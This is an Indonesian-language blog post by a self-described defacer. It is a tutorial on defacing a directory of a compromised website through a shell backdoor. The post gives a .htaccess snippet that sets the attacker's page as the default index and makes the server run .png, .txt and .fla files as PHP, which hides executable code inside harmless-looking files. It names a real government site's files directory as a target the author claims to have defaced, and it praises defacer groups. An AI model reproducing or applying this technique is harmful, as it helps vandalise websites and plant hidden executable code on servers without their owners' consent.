Thursday, September 27, 2018

Tekhnik menebas dir website menggunakan .htaccess pada shell backdoor

Oke Guys Kali Ini Saya Akan Memberikan Tutorial Bagaimana Membuat Sc Kita Default Diweb Bukan Dengan Mengindex index.html atau index.php/mengedit menggunakan script kita difile indexnya,jadi gini biasanya gw kalo nemu target yang gede jarang we tebas:D,,lumayanlah buat pasang iklan indexnya...tekhnik ini juga belum banyak orang yang tahu mungkin hanya sebagian yang udah tau,kadang juga para defacer menebas sebuah dir dengan cara edit indexnya kasianlah adminnya iyya kalo dibackup,kalo nggak gmna hayoo,bangun web itu susahloh,merusak lebih gampang daripada ngebangun true gak?:'V
kalian buka dir yang ingin kalian tebas,tpi ingat jangan di dir public_htmlnya sayang:'V contoh dari web yang kutebas bagian filesnya http://inovasi.lipi.go.id/files/ web yang indexnya aman
http://inovasi.lipi.go.id/
Pertama kalian upload dulu script defacemu misal: scriptmu.html
Oke Langsung Aja Comot Scriptnya Lalu Kalian Edit .htaccess yang aslinya menggunakan script ini

#Jangan Diganti! Atau Error!
#Alternate default index page
DirectoryIndex scriptmu.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

save menjadi .htaccess

 http://inovasi.lipi.go.id/files/

dan lalu kalian cek dan hasilnyaa buummmmmmm:'V,jika
mungkin sekian dari saya fake-syst3m,semoga bermanfaat...
jika ada yang ingin silahkan ditanyakan dikolom komentar

special thanks to my team dark side team and all defacer indonesia
GreetzTo: Cyber#00t

No comments:

Post a Comment

Redirect ke POST jika hanya ada satu POST di Category maupun Tag WordPress

Tambahkan kode ini di bagian bawah file functions.php pada THEMES Anda. Kode ini akan mengarahkan secara otomatis ke URL POST / Artikel j...